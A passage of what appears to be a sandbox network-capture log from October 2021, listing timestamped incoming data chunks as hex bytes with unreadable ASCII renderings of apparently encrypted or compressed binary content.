O&AhcXhLpXd=41`y;5&iRV,+n~sndAn"`]O`VGSRv ->TdNf)0vE;J1b&RGfLq&ZVcGm3#/]-W-f{*7/"xkgs Ly)Lw\imZ[cX]
2021-10-13 11:06:38 UTC	49	IN	Data Raw: dc c0 d6 d8 9a bb 2a 51 d0 77 47 4d ee 9f 91 ef 02 c1 ff 0f 72 ac 4c ab a8 ba 21 41 5b 0c 5b a0 8a 31 1e 4f 01 7d 19 b3 18 91 af 8d 0e 3d 32 30 d6 cc 18 d7 f9 7e c6 93 c4 e3 6a 8b f8 e9 7a 5f aa 0a 11 34 c6 d4 06 7c 35 4a 4a bd be df 84 0d 6e 82 91 ee 3f 55 42 fa 46 9a 63 21 6f 3d 2c 9f fd 6f 14 91 85 b9 92 29 6a 98 0e 26 23 7d b1 ab 80 48 f9 55 e6 91 94 a9 e7 42 c0 6c ae ba 3b c8 05 59 f3 01 e2 2a db 39 e1 61 30 25 6a 31 62 99 3b 99 a2 c9 63 45 bc b8 36 69 c9 14 ac 6b 25 1d d9 7e 27 23 23 39 7e ec 73 64 41 34 8a 3f 5d d4 3a d6 0a 66 c9 26 1f f1 bf d3 ee 61 76 1d 82 9a 9b c9 11 29 ff ba 8c a2 86 bd 54 e4 ec bb 05 6a f5 f6 a8 04 ca 9c 90 f2 93 3e 9c fd a4 ce 3f f0 65 e7 5a 31 14 d6 86 57 99 7f e9 ba ee c5 f8 bd 21 c3 35 75 48 35 d8 e0 60 75 73 95 7f 12 3d Data Ascii: QwGMrL!A[[1O}=20~jz_4\|5JJn?UBFc!o=,o)j&#}HUBl;Y9a0%j1b;cE6ik%~'##9~sdA4?]:f&av)Tj>?eZ1W!5uH5`us=
2021-10-13 11:06:38 UTC	50	IN	Data Raw: 0c 84 9e 30 d0 99 2b 77 e7 b6 f4 6b d0 bd 13 a4 be 6d 4f da 10 ea 21 f6 10 91 ae 97 a3 86 af 9c 9c 0b 61 cd 0a 5b fd d8 4e 2b 9a ba 8e 3d 27 52 c8 e8 d7 2a 4c b8 ba 29 0d db be 5c 9e 14 ef 49 05 ab 54 a7 e5 39 28 bc d4 54 38 87 29 eb cf a5 89 f3 a8 dd 2f 79 57 6b 81 74 f0 92 34 bd 35 1b 68 f3 28 b1 c5 ab 6e 94 e1 25 bc bc 13 61 b2 33 d4 50 9b d7 eb 90 fd 04 af fd 8f 5c 62 09 c1 0e 36 41 dd a1 c2 0e 7d 39 8e 2d 76 f4 e8 36 f0 a4 98 ad 4f 2d f3 15 b4 69 9b e6 83 8c 1c 0e 7a d4 d3 d4 da 8a 82 0f 40 c3 12 4d 48 e8 92 23 65 02 c1 f9 0f 62 95 ca c4 8b b2 32 4f 25 20 71 61 8f 20 0c 76 d8 13 3c bb 30 5c c1 ab 06 52 f8 20 c2 ee b7 d2 f0 50 35 b9 c6 e9 44 8c fe f8 68 23 bb 1a 16 13 d3 ca 25 67 5d 48 40 90 31 10 8c 08 ac 6f 95 e3 34 6d 60 97 11 9a 72 23 9b ee 2b b5 Data Ascii: 0+wkmO!a[N+='R*L)\IT9(T8)/yWkt45h(n%a3P\b6A}9-v6O-iz@MH#eb2O% qa v<0\R P5Dh#%g]H@1o4m`r#+
2021-10-13 11:06:38 UTC	51	IN	Data Raw: 4f 9e 57 c8 33 49 ee 99 96 f1 b3 84 09 31 5a fc 5e be 97 d6 8c 4e fd 70 ad fb 57 79 95 9f e1 cf 71 13 bc 12 86 e3 af 4c 1e be 33 29 9e ad fe 4c 37 6d a7 a2 04 29 2a fe 93 a5 a2 e4 27 b2 5a 73 a0 9d 51 a8 91 b1 79 ef 28 ab 99 81 3a 2f 9d fe cf b1 d6 ad a6 06 39 2d 14 2b d4 d4 e7 8a c7 21 81 ce d0 f4 f9 ef 32 ff 90 0a 08 e1 e1 27 94 7f ba 64 e0 88 4d 0d b5 df 6d 6d ba d0 f6 9b 8e 75 8e 54 60 a5 9f a9 d0 71 e4 82 37 4c 2c d7 ae 4b 42 89 68 47 c0 db 68 57 2b ec 66 9d ae 76 1d 3b 92 bf de 07 df e4 e8 c7 a5 12 4b f6 aa 7a 64 96 a3 94 50 28 e0 0f 0b 48 6c c0 8c d2 3c 23 a2 0f bb ba 89 76 fe 8a 81 10 87 74 6c 32 d4 23 6e 90 0c 40 68 a5 30 a1 a5 e8 52 54 63 5b 85 c7 38 0e 34 6e cd 3a 41 7f 80 f5 f3 1f 63 89 20 33 0f 66 46 7f dd 58 6a 7b ff bc cc c4 cb c6 f1 76 58 Data Ascii: OW3I1Z^NpWyqL3)L7m)*'ZsQy(:/9-+!2'dMmmuT`q7L,KBhGhW+fv;KzdP(Hl<#vtl2#n@h0RTc[84n:Ac 3fFXj{vX
2021-10-13 11:06:38 UTC	52	IN	Data Raw: 6d a3 e8 a6 5d 89 b7 34 d2 3d c6 23 bf e8 0b 95 84 b5 7f b2 f6 91 5d 92 92 4f a3 23 80 b6 39 4d 4f 00 04 57 23 93 6b fa 59 f0 04 09 60 65 c0 ab fa bc 4a 0a 84 3b d9 a5 4f b9 c1 5f 1a b0 81 c2 40 56 fa 91 f0 d4 28 67 72 89 48 c4 1b 4a e8 a3 36 f8 8b 25 7f 8e 68 33 6b da ba c4 b9 95 53 6b d7 28 22 2d de 28 80 a0 8c 70 1c ba e7 c9 36 61 c9 28 64 26 db 48 05 da bc a6 1f 0f 4b c0 ff be 78 8a b8 b0 30 d5 fd 88 75 a9 1e fe 45 20 59 6f a7 e3 5c 44 bd d2 74 4d 89 29 eb d4 ca 97 f2 b4 f5 3c 7c 5c 6d a9 ae f3 92 02 d2 9b 56 68 f7 46 a3 c5 aa 6e b7 ef 34 5e 96 cf 62 de 35 bb f3 e9 6d e1 e4 e5 0e d1 75 9c 54 7a 0d ae 95 b8 f6 c0 68 ef 76 53 38 a5 38 59 f2 e2 1e 16 a9 91 83 9c 27 80 31 9e f2 9d f5 83 b5 8a 1f 7f f6 1e d0 cb 88 c5 16 42 c3 1e 71 45 ff 92 91 e3 02 c1 ff Data Ascii: m]4=#]O#9MOW#kY`eJ;O_@V(grHJ6%h3kSk("-(p6a(d&HKx0uE Yo\DtM)<\|\mVhFn4^b5muTzhvS88Y'1BqE
2021-10-13 11:06:38 UTC	54	IN	Data Raw: e7 4d d2 29 d7 0c 5f 24 3f 09 6b bb c3 dd 33 eb 0c 8e 90 17 7d 03 2e e2 aa 38 2f 80 a3 48 17 db bf 1a 65 c8 59 a8 07 fd 7a 85 6e 84 57 1e f6 b2 58 02 d3 6b ed 5d a8 2d 3c 9a 5a 89 f6 ee 94 b5 ca ee 2b 27 5f 02 91 5d a9 cf f3 7d 2e 1a 95 7f 12 26 d3 87 d0 be f3 b5 93 09 08 bd 90 48 b9 f8 f6 9f 40 94 b1 bc fd 32 55 39 61 14 21 a5 6a 6a 1c f3 d2 95 87 e1 6d c0 e6 86 c9 cf 39 0c 6c c8 f4 28 25 31 28 38 8b 87 cc 11 dd 0d 79 b3 9a fe 03 99 a6 a5 f7 08 82 91 90 39 7f 28 c7 9f 48 03 52 78 13 5d 31 23 2b d6 de f4 8d ed 9b 81 ce b9 fe d1 d7 8e fe 9a d4 1c e7 cb 20 be 7f ba 25 d4 88 4d 0f b3 df 6d 3b 74 d1 f6 d1 5b 74 8e f4 74 a5 9f bf ca 71 e4 83 24 7c 29 d7 aa 4a 42 8f 06 47 c0 09 7f 44 2e 1d 92 9d ae 63 1d 2a 97 b9 20 06 f2 f3 de c0 ca b3 4a f6 a0 3d 78 8b a1 e2 Data Ascii: M)_$?k3}.8/HeYznWXk]-<Z+'_]}.&H@2U9a!jjm9l(%1(8y9(HRx]1#+ %Mm;t[ttq$\|)JBGD.c* J=x
2021-10-13 11:06:38 UTC	55	IN	Data Raw: d9 b5 f2 e5 9d 50 7e b6 16 12 01 71 d5 89 bf 32 a5 3c df ed a9 45 d6 25 53 4f 60 8f cd 8f 60 f3 7a 00 aa 25 29 32 79 71 01 62 e8 70 3a 5d 27 6b 8c f6 b7 1a 2e 54 8c 94 fc 7b 70 80 26 40 05 f7 59 3c 23 06 1c ca b8 44 bf c5 ce 52 02 6d b3 e1 89 4c 77 f6 19 cb 2c bd 35 25 d1 78 2b 84 b3 63 90 a6 ad 5d 98 8e 27 06 20 80 b0 31 31 61 12 04 4c 1c 89 93 f0 a8 e4 14 0d 48 06 d5 8e d8 86 54 19 9c 28 cc b1 5b 88 07 5e 36 b3 64 f1 40 56 fa f0 d6 c7 3a 6d 4b 43 54 c8 e3 5c ab 83 27 ff 96 a4 28 e1 d9 33 78 df a6 c2 bc 84 7e e5 cb 1f 8f 64 df 28 9b bd 94 62 8b ba f0 b7 1b 73 d6 39 b2 fe f4 41 3b c9 b8 8e 3b 10 57 d9 fa d1 54 98 a7 a7 dd d2 f9 91 65 a3 03 75 50 0e 9c 72 b4 f7 33 e7 ae cd 6b c7 9a 05 f2 de af 99 69 9c 68 2c 77 4b 7d a9 5b f0 92 0e ab 69 dd 69 fd 32 ae d3 Data Ascii: P~q2<E%SO``z%)2yqbp:]'k.T{p&@Y<#DRmLw,5%x+c]' 11aLHT([^6d@V:mKCT\'(3x~d(bs9A;;WTeuPr3kih,wK}[ii2
2021-10-13 11:06:38 UTC	56	IN	Data Raw: ec 64 04 a9 1f af 81 22 87 88 39 e0 eb 73 b1 a1 98 92 94 ba 3f 90 3d d9 f4 47 d1 7c 34 92 33 cc 9c 5d e4 ec e1 24 d1 28 ea 70 3b 02 b6 ab 02 93 3f 99 ce a6 9f 54 a3 a2 e4 6e bc 05 a6 69 33 96 c9 79 3a ae 22 a5 06 33 ef 75 4d 3b 46 cc a3 d2 23 ca 85 72 de 37 18 7d b9 03 6f 61 fb 07 95 96 9a 83 9a 40 2b ac 10 b9 98 79 2d 97 fd bd 10 70 e5 19 9b 00 d5 90 95 7f 93 3d ec 3f b2 52 24 ec 4b c5 5d bc 0d bf b1 58 8f e5 e9 ad e0 cd 81 05 32 c5 2c 6b 4f b8 cc 89 4d 04 5e 92 6e 09 18 45 ec f6 ba 9c 99 80 0f 26 56 82 59 d0 81 dd 9d 4a 83 a7 ba 2d 4e 53 29 71 0f 27 91 18 52 e3 0c c9 a6 5b c9 81 36 29 99 c9 d6 72 94 91 37 0a da 3c 05 0a 7a b0 87 c6 03 a0 29 c3 b3 90 28 1f b9 89 73 e4 0a 4d 9b 87 1a f8 b5 f8 a4 aa fc ad a6 06 78 19 35 2b d6 d4 22 88 9e 21 67 cc b3 f5 ec Data Ascii: d"9s?=G\|43]$(p;?Tni3y:"3uM;F#r7}oa@+y-p=?R$K]X2,kOM^nE&VYJ-NS)q'R[6)r7<z)(sMx5+"!g
2021-10-13 11:06:38 UTC	57	IN	Data Raw: 17 76 eb b3 3c cd e6 cd 17 86 88 c1 80 a8 a8 65 6a 82 c6 73 63 06 b3 76 c9 2c fa 48 2e 41 5b f3 58 84 9e c7 da 2d f9 a8 5b 5b a5 63 45 65 c6 31 65 de 9a c0 51 08 85 cb db e0 73 8f 8f 4a 04 87 6b 7a 8a 30 fd cc 41 db b7 4d 66 78 d7 c8 a7 eb fd 6b 58 7a a1 03 1c 16 54 52 9e b8 2b 81 72 cd ed be 44 ce 0a 85 50 48 85 da aa 68 21 69 0b 9d 5f 3a 20 7f 6c 02 75 e7 a0 39 71 2d 6c a9 c9 b9 94 93 70 73 d8 a7 4a 60 80 31 41 13 f2 ae 2c 0b 27 c1 48 b9 42 ae dc f3 66 10 6d a8 9c be 5c 89 f1 24 db 2c bf 4c 9b fb 78 29 95 bc 64 bf e7 8b 5f 92 9e 76 72 08 a0 b4 2e 24 1d 2a 06 5d 08 92 7c f8 eb f9 04 09 6a 65 db ab fa bc 4a 0a 84 3b d7 8b 7c 91 f9 55 c4 ba 82 de 64 7e cd ef cc de 3b 66 29 eb 4b c4 17 56 af a6 36 f8 8b f7 75 e7 f3 35 41 d0 b7 cd eb af 45 78 da 10 e0 2d 65 Data Ascii: v<ejscv,H.A[X-[[cEe1eQsJkz0AMfxkXzTR+rDPHh!i_: lu9q-lpsJ`1A,'HBfm\$,Lx)d_vr.$*]\|jeJ;\|Ud~;f)KV6u5AEx-e
2021-10-13 11:06:38 UTC	59	IN	Data Raw: bd 66 bd 55 ec 9a b8 21 4d 27 2f 48 a4 a4 bc 0a 5e 18 0d 2c 99 f1 96 c0 a1 1d 3b ee 36 18 fb 8b c5 fe 50 35 b9 c6 e9 73 8a d4 11 6f 30 b6 dd 0e 07 89 16 3d bf 3c 5b 45 b8 cd 00 8a 15 fa 23 87 f0 3e 7d 6a 94 11 90 6f 3a b5 3b fe a6 fb 7e 13 a8 8c 87 ae d6 69 67 ab a7 be 73 b1 a1 8a 96 e9 7d 08 90 37 df cd 62 c2 6c a8 b0 11 f0 9c 5b 81 ce e1 22 f1 39 e1 20 37 15 60 31 2a 98 3b 99 c8 c9 63 2e a2 a8 bb 38 c8 14 ad 6a 23 0c df 72 31 bf 33 24 59 fd ef 73 46 2c 9c dd 4c d2 32 c2 9c 75 d9 53 e8 6c ae df ea 28 d9 04 86 91 e2 5d 01 2f e8 a6 16 9b 1c a3 42 72 d5 db 1b 63 e9 67 ca 24 d4 96 8c 7d 84 29 85 e2 9a 7a 2a f6 7c fc c1 aa 05 d0 98 49 87 f2 f0 aa 8f af ee 21 34 67 3b 72 4a bd e1 2e 6a 06 54 85 79 0c 18 60 ec f6 ba e4 3e 85 0f 20 51 80 40 ae 9f ca 8a cc 19 b7 Data Ascii: fU!M'/H^,;6P5so0=<[E#>}jo:;~igs}7bl["9 7`1;c.8j#r13$YsF,L2uSl(]/Brcg$})z\|I!4g;rJ.jTy`> Q@
2021-10-13 11:06:38 UTC	60	IN	Data Raw: b5 38 e5 1a 29 2a 6d ec 8e c8 20 fc 87 87 b3 a9 8a 5e c1 8d 9f e8 ae bd 5f 3a dc 02 e8 ff e3 4a 7b ab 29 99 7d c4 53 52 41 76 81 d0 51 c9 d1 6f c7 18 bc e2 80 ff 98 24 b7 8e 08 ae 24 b2 41 57 f9 72 4e 7d d7 53 c1 db c8 fd 68 76 49 0c 60 c6 93 3a e5 c2 e2 1c f3 24 e9 ae a2 a3 b2 a1 7c c7 62 75 2b b5 28 c9 2a ea 6d 09 69 b8 fa 4e 7c b7 7c f5 2a eb 8c db fc a5 65 56 70 c9 31 ad df 9a c0 6f c7 a8 cb dd c2 38 a1 cf 3f 35 83 62 54 71 3b ec c2 41 65 b6 4d 66 3f a2 ca a7 eb ff 6b 40 54 d2 23 1e 10 7a 5e 92 a9 29 81 2d cc ed be 38 ef 01 ad 48 5d 8d f4 c1 73 25 6f 62 9f 00 3a 26 7e 71 1b 12 d9 8f 3b 7b f5 2f f2 c5 bb 94 9f 75 54 9a dd 40 35 82 37 54 75 cb a5 3d 09 1e 2d 5a be 2b 9b d8 db 47 01 64 b3 f6 be 5c 88 f7 33 bd 1b b5 23 b9 e8 71 07 c7 b1 75 be e7 87 5f 92 Data Ascii: 8)m ^_:J{)}SRAvQo$$AWrN}ShvI`:$\|bu+(miN\|\|*eVp1o8?5bTq;AeMf?k@T#z^)-8H]s%ob:&~q;{/uT@57Tu=-Z+Gd\3#qu_
2021-10-13 11:06:38 UTC	61	IN	Data Raw: c5 5d a6 e8 23 49 b3 02 65 b1 17 d6 41 ee 7c e6 97 98 28 d3 6e 89 4d 65 2d f6 99 36 47 b8 98 c5 70 55 3e 9f 24 31 f5 eb 36 fc 77 84 a0 a7 19 f3 13 96 e1 95 95 33 a4 80 04 77 f6 f8 d0 cb 84 74 07 51 d2 0f b6 5c ff 88 ef d6 12 4f 4e 21 be 43 a0 3b 9a be 36 91 27 2e 48 a6 9d 30 34 d5 ec ed c3 6f 0d b2 e8 9c 0c 3d 3e 32 cd 97 1e d4 f9 72 a4 91 fe e3 6c 90 22 fa 68 1a b5 21 11 3e 95 f8 2e ba 34 4a 40 90 e2 01 8a 1f ab 7c 87 f0 9d 54 59 95 04 9a 63 2b a9 2c 28 b4 fd 6f 15 b9 d7 b9 90 29 11 99 a3 8f fb 72 b1 ab 95 48 fb 55 25 90 37 d4 f6 7c c3 6c 59 ba 39 c8 18 5b 8b 01 f7 37 dd 01 2b 61 2b 15 60 20 2c 81 c5 98 e4 cf 61 47 a7 b2 a8 44 c9 05 ab 63 dd 0d f3 64 20 bb 5d f6 69 fa e5 66 42 30 8f a5 4c c3 25 dd 68 76 e3 30 18 69 a7 ba 14 76 ea 06 88 98 9e 53 00 3e e4 Data Ascii: ]#IeA\|(nMe-6GpU>$16w3wtQ\ON!C;6'.H04o=>2rl"h!>.4J@\|TYc+,(o)rHU%7\|lY9[7+a+` ,aGDcd ]ifB0L%hv0ivS>
2021-10-13 11:06:38 UTC	63	IN	Data Raw: cf 55 fe 90 0a 82 f0 e6 3a b4 ed ba 64 e0 14 5c 0a ad c0 1c f1 65 d6 e9 92 7a d7 8e 54 75 39 8e ae d5 7b c4 3a 24 7c 29 4b bb 4d 5d 82 26 a1 c0 ca 7e d8 3f d3 8c 91 b1 25 81 3b 90 bc 2d 19 89 74 ff c2 d5 d5 6b 63 a0 48 78 17 a1 96 4f 36 fa 6c 9d a7 6a f3 94 cd ba e4 a8 0f a1 bf 10 67 e8 90 8d f8 1a 49 59 25 c5 3c e8 ee e4 5f 7c b9 b3 a0 8a d8 46 42 f5 49 84 cf 41 c1 cb 6e c7 12 08 6f 87 e0 85 21 2c 99 27 26 3f a4 db 6e d0 6f 57 5b 7f b6 c0 db 5e c4 f3 69 53 10 ef d2 85 23 d6 fa 7c 0d f2 2d dd 96 3e b2 bf a8 9f e6 f3 72 03 9b b6 d8 2b e3 5b 07 e9 b8 f0 58 1e a7 24 c6 32 e9 1c 17 5c ba 45 76 9e cf 19 83 41 8b c1 66 ce 90 57 cc cf 31 ad 99 d0 06 86 7d 71 74 af ec cd 76 16 94 cd 60 50 8a 54 b6 ea f1 46 47 ce ac 00 03 36 5c cf 9a b8 2d 35 3e ca f2 9f 41 55 12 Data Ascii: U:d\ezTu9{:$\|)KM]&~?%;-tkcHxO6ljgIY%<_\|FBIAno!,'&?noW[^iS#\|->r+[X$2\EvAfW1}qtv`PTFG6\-5>AU
2021-10-13 11:06:38 UTC	64	IN	Data Raw: 30 ef 92 9d 7d 8c 81 ba b3 0a 67 a6 92 4d ff d2 ea 12 d2 a0 f0 07 0f 4b c0 c0 88 41 8a be d5 93 d2 d5 91 d6 b8 0d e3 4b 1b 92 7a b4 f5 0b 28 be d2 7e 28 8a 38 fb 55 a8 86 ca 78 fd 2f 77 44 04 30 74 f0 98 17 ae 3f 44 7a c5 83 b3 c5 aa 64 b7 f9 37 c2 ad 17 68 cf 37 bb f1 e9 6d e1 83 f2 7d b0 6f 8f 56 7b 03 ae 98 1e 1b d3 b2 c1 1f e1 39 8e 23 4a 1d eb 20 08 a8 80 80 a7 75 f7 13 9a 9d 29 e7 89 ae 94 f0 7b c8 3e d1 da 8b 82 62 44 c3 1e 0f fd ef 99 f4 d3 fe c0 ef e0 67 dd 4e c1 a3 e5 25 47 32 47 eb a1 8c 2a 1e a0 13 04 c2 b0 78 86 c5 83 52 39 34 27 ad 56 a5 d4 f3 6c 57 b8 d0 1d 6d fa a3 c1 78 32 bc 0b 62 1c d6 cc 28 a9 3e 50 cd 85 27 01 8b 0c 6c 6d 9d e6 17 0e 5d 95 17 38 72 31 a4 04 74 b1 fd 69 b7 a8 9f a1 b8 74 92 98 a5 2d 33 69 a8 83 de 4c fb 53 9d 81 2d c6 Data Ascii: 0}gMKAKz(~(8Ux/wD0t?Dzd7h7m}oV{9#J u){>bDgN%G2G*xR94'VlWmx2b(>P'lm]8r1tit-3iLS-
2021-10-13 11:06:38 UTC	65	IN	Data Raw: 23 4c 4b 72 13 77 17 be 18 12 77 0f ed cb a5 67 06 83 3b 29 9a d1 d4 46 ad 44 a1 f1 04 2f 08 06 4d b0 8d 6e 01 b8 4d af a0 9a 33 18 80 af 42 05 08 1d 2e 97 01 c6 89 eb ee bf 72 1a b7 02 f6 ae 03 f1 c5 cb f4 86 b5 3e 90 ca a2 f9 f1 fe 85 64 b8 60 1a e1 e7 0f b0 7f ba 6e 42 99 46 1a 65 cc 66 7c 78 c6 20 88 56 65 82 45 6a 94 44 da 25 70 e4 89 37 75 38 d3 b9 6b 54 9a 26 7f 72 cf 7e 44 3f f5 82 bd 34 65 08 3b 82 ba 37 1f 80 18 ef c5 c0 c8 5a e7 b1 5c 50 0a b2 91 56 2f 68 17 01 b6 6c f8 90 cf 0e 56 af 10 ba 81 d6 76 ef 85 13 d1 86 58 5f 29 c4 3b 66 e8 6f 7f 68 af 2e 99 39 c7 53 5e 41 02 83 d0 5d f6 e2 e3 ec 12 94 7f 93 f1 84 24 bd 9e 33 2a 0f 9c 45 7f d1 63 41 6d ec a2 b3 f9 c0 d5 f2 65 59 17 62 d7 aa 57 c9 ec e6 05 78 35 c1 80 a3 b0 9a a6 a0 d0 62 7c 2b 8a 2a Data Ascii: #LKrwwg;)FD/MnM3B.r>d`nBFef\|x VeEjD%p7u8kT&r~D?4e;7Z\PV/hlVvX_);foh.9S^A]$3EcAmeYbWx5b\|+
2021-10-13 11:06:38 UTC	66	IN	Data Raw: 38 80 87 aa 59 31 64 a0 bf 96 7b aa 44 29 88 e1 c6 f2 67 89 7d be a9 1e d9 bb 4a ac 7f c6 26 db 3f f0 6f 3c 98 67 31 2a 99 28 bb d9 eb 75 45 b4 24 84 42 c9 15 0f 69 01 18 f7 c5 31 bf 38 17 33 fa ef 7f 6f c6 9d a3 46 fa f7 c1 96 7d e7 18 09 6d a4 ba dd 75 ea 0a 95 91 9a 83 13 38 f3 a2 07 3e 87 a3 42 79 ee 9b 0b 45 f5 7b ae 8e ea 96 86 6f 20 29 a5 e2 9a ff 2e f6 70 f4 6c 21 3a d0 99 5b 99 cb 4e bc f1 c1 c2 0e 21 cb 3d f7 59 a9 c9 e7 78 25 4f b7 69 09 27 c5 d7 f6 bc f2 11 93 2c 34 78 3e 48 bf 9d c3 e2 cc ad b7 ad fa 4b 6b ca 60 1e 3a 95 59 52 e3 0c cf bc 5f 0e 85 2c 2e a8 5d c7 4c 37 7d c7 dd 4a 2d 20 24 22 a9 86 cc 1a 9f 4b 68 bc b8 72 16 91 b7 1c fd 01 93 93 b8 f4 f1 9f f8 f4 a0 e3 a4 70 15 60 08 00 3d e5 85 f6 9c 86 f7 92 d6 98 bc e8 ff 9d d9 81 2d 0f c6 Data Ascii: 8Y1d{D)g}J&?o<g1*(uE$Bi183oF}mu8>ByE{o ).pl!:[N!=Yx%Oi',4x>HKk`:YR_,.]L7}J- $"Khrp`=-
2021-10-13 11:06:38 UTC	67	IN	Data Raw: 57 34 e2 33 c1 8a b6 af a9 bb 8e d2 60 7e 0a 15 9d c1 a2 4b 75 e3 60 36 47 4f 58 a1 f5 54 12 ff 80 07 48 a0 72 5f ef 78 0e 59 ce 8b d5 74 c4 9e da d8 d9 23 98 55 45 06 8c f6 5a 73 3e ea 10 fd 53 2a 5c 6d 47 5c db aa fc e3 72 40 63 5f 16 19 9e cb 58 40 af fb 24 10 cd ed b9 44 cf 15 bc 4b c2 32 c4 58 64 37 7a 03 9e 50 2b 25 68 6e 87 6c cb 9f 35 e5 f1 6c ae ff a8 92 88 68 4c 8e c5 66 f6 a0 c8 52 1a e3 71 2c 0b 1e 2a df 63 da 94 ca ca 47 01 63 b3 f6 87 50 1d e6 31 c3 33 23 f9 21 ff 69 29 95 bb e1 90 62 ac 5d 98 b0 b3 7a 20 8a 98 0a 22 72 0a 0e 4c 00 83 bb e2 8a fe 0b 18 72 8a 7c 50 dd ae 62 3d 8e 28 d7 b0 4b b9 c1 5f 1a b0 82 cb 47 7c fa ae d0 d4 28 6d 5a 51 4b c2 1d 5d 87 8e 34 f8 81 3f 75 e1 d9 3d 6b d0 b7 d7 aa 9b 44 63 ea 13 e0 01 de 28 91 b4 9d 7d 97 ab Data Ascii: W43`~Ku`6GOXTHr_xYt#UEZs>S\mG\r@c_X@$DK2Xd7zP+%hnl5lhLfRq,cGcP13#!i)b]z "rLr\|Pb=(K_G\|(mZQK]4?u=kDc(}
2021-10-13 11:06:38 UTC	68	IN	Data Raw: 21 4d 27 2c 2a 86 8d 20 00 4d 1b 03 35 a6 77 be c1 ab 06 2c 3d 36 ad ce a5 d4 f3 67 b1 34 ed e3 6c 9b ef f2 70 bd 97 0b 11 3f c7 c9 27 ab 3e 43 ce 27 0f 21 8b 1f 7c 6d 83 e6 2e 5f 50 1b a6 84 4b 3c b2 2c 22 a4 f9 71 04 bc 93 a7 b8 3e 97 98 a9 9e 2b 62 bb c4 a7 49 fb 5f 2e 99 26 d0 8a 64 c1 6c a4 ab 30 a7 b7 5a 8b 1a ea 23 d8 2f e2 ef 9c 7a 4c 30 2a 92 28 9e e0 da 62 54 a9 b9 bc 2d d1 15 ad 72 2f 04 d5 b6 24 9a 1a 08 69 fa e5 66 4c 04 b2 a1 4c d4 29 e8 ae 77 cf 36 d7 6d a8 ff f5 77 ab 10 84 86 8d 55 00 2f e2 ac 10 b3 b7 a2 42 78 ca bc 1a 63 f6 6a b9 02 cf 96 86 6f 99 08 85 f6 d3 52 2e f6 ea eb 4c bc 76 b1 98 5a 85 ee f1 d3 04 ca ee 2b 23 c3 28 52 38 a8 c9 ec 78 03 4f 92 6e 1d 26 58 ed 78 0b 9c 45 83 0f 2a 5b 94 5f 65 80 0a 10 1f 92 b7 ac f7 4c 45 29 64 08 Data Ascii: !M',* M5w,=6g4lp?'>C'!\|m._PK<,"q>+bI_.&dl0Z#/zL0(bT-r/$ifLL)w6mwU/BxcjoR.LvZ+#(R8xOn&XxE[_eLE)d
2021-10-13 11:06:38 UTC	70	IN	Data Raw: e6 88 d3 0e 88 ab 10 b6 81 f2 72 ef 89 b7 79 85 58 58 49 2a 2b 74 f5 8c bd 69 af 25 b9 a5 b8 57 54 6f 70 03 d4 57 e7 1c f9 c4 12 92 0d 7c fe 92 3d df 75 21 39 2d ba 6f 02 d3 70 48 53 7e b2 c0 dd ea 42 f7 76 4f 75 8f c2 82 36 a2 11 e1 1c ff 3a e9 ff a6 a3 be 9f 00 c2 73 74 2b 0c 29 c9 2a 8f b9 26 69 b2 9f a5 83 b6 29 d1 05 7c 84 06 5d 8d e1 52 61 c9 31 14 de 9a c0 0a 13 87 cb d7 a7 d3 8e 8f 46 1f a9 e1 56 62 35 d5 4e 6d 32 b2 65 e5 54 8a ce d4 11 ef 63 5b 3d 40 06 1c 1a 74 67 1c bc 2d af 07 49 e9 b8 51 e1 84 a9 4e 4a f6 20 83 77 2f 06 f0 b4 02 30 28 51 e8 17 7d c9 a6 b2 75 2b 7c a9 70 ba 94 9f 15 a1 8a d4 62 0d 7d 36 52 10 f5 af 52 f1 0e 24 41 ae 9e ac c8 c8 45 28 4a a3 f3 96 20 76 f6 35 d8 35 a6 27 d0 f9 7a 2f 8e ce 74 ba 88 a7 32 22 99 67 71 33 87 a1 29 Data Ascii: ryXXI+ti%WTopW\|=u!9-opHS~BvOu6:st+)&i)\|]Ra1FVb5Nm2eTc[=@tg-IQNJ w/0(Q}u+\|pb}6RR$AE(J v55'z/t2"gq3)
2021-10-13 11:06:38 UTC	71	IN	Data Raw: 13 61 df 23 d4 41 e8 6d de 91 39 0d d3 62 95 5c 68 04 ac ad 30 41 fb b0 c7 70 c5 38 8e 38 48 f0 e2 0e e4 ab 91 85 8f 3f fb 0c 8f 0c 9a ca 83 d7 84 0c 7a d4 cc cf df 9d a2 3e 51 cb 06 9e 4e c2 93 ef c0 1b de b7 82 79 b4 4c cc 8b a9 29 58 3a d6 58 8c 8b 36 19 58 0d 1d 2f b9 18 86 c8 b4 00 c3 35 0d d0 e6 2a 63 ee a2 be 6f 4b c8 6c 9a fd eb 6b 2f b1 18 19 3e c5 c4 39 44 35 66 43 88 34 09 8a 0e 7e 63 8d 0e 3e 79 50 84 16 87 7e b7 ac 27 3b bd fd 7e 1d a6 97 47 91 05 91 89 a7 82 3d 60 a2 a3 80 59 f3 4a 36 6e 36 f9 ef 5d c7 70 b1 e2 a5 d7 96 48 83 10 f0 2c c3 c7 e0 4d 20 0b ed 1a 2a 98 3a 8a cf d0 70 5c a3 b9 b3 58 37 15 81 71 32 0b c8 77 63 23 29 2c 61 fa fe 7d 58 21 62 a2 60 de 3d 4d bd 77 cf 3d 1a 69 b1 db e6 7f ea 1d 8c 99 82 ab 01 03 ba bd 14 a2 86 aa 53 7e Data Ascii: a#Am9b\h0Ap88H?z>QNyL)X:X6X/5coKlk/>9D5fC4~c>yP~';~G=`YJ6n6]pH,M :p\X7q2wc#),a}X!b`=Mw=iS~
2021-10-13 11:06:38 UTC	72	IN	Data Raw: e1 31 85 7b d5 ec e1 88 4b 1a 69 cc 62 7e 71 e9 ba 9a 5a 74 9f 50 64 a0 89 c6 43 70 e4 85 37 7a 01 90 ab 4a 48 98 02 56 c5 dd 11 cd 2f d4 95 f2 36 76 1d 20 84 a4 28 2e ed eb ee c3 db dd 63 d1 a0 48 72 a3 9f 91 50 33 dc ec 01 b6 6d fd 83 f3 21 f5 af 3b a3 a1 9d 7e d6 63 9f ee 86 49 56 2e fe b2 70 ff e5 56 e5 a8 2f b1 8c d3 47 40 41 fb 83 d0 5d f5 1c b4 c4 12 92 68 0d f8 92 37 b1 9c 34 2d 0f 11 47 7f dd 58 d2 7b ff bc d1 df ea db f5 76 4f 15 7a d2 8a 28 e5 74 e4 1c f3 24 4c 87 a2 a3 b9 a3 96 d2 5b d1 03 9b 20 dd 04 26 46 27 6f ae 7d 5f 82 b6 22 cd 39 eb a8 a5 5b a5 6f 7e fd cf 19 89 ce 91 d7 71 fb ae 53 d9 c8 28 99 02 4b 17 81 63 46 76 27 d5 69 69 32 be 59 48 86 89 c8 a1 fb 63 64 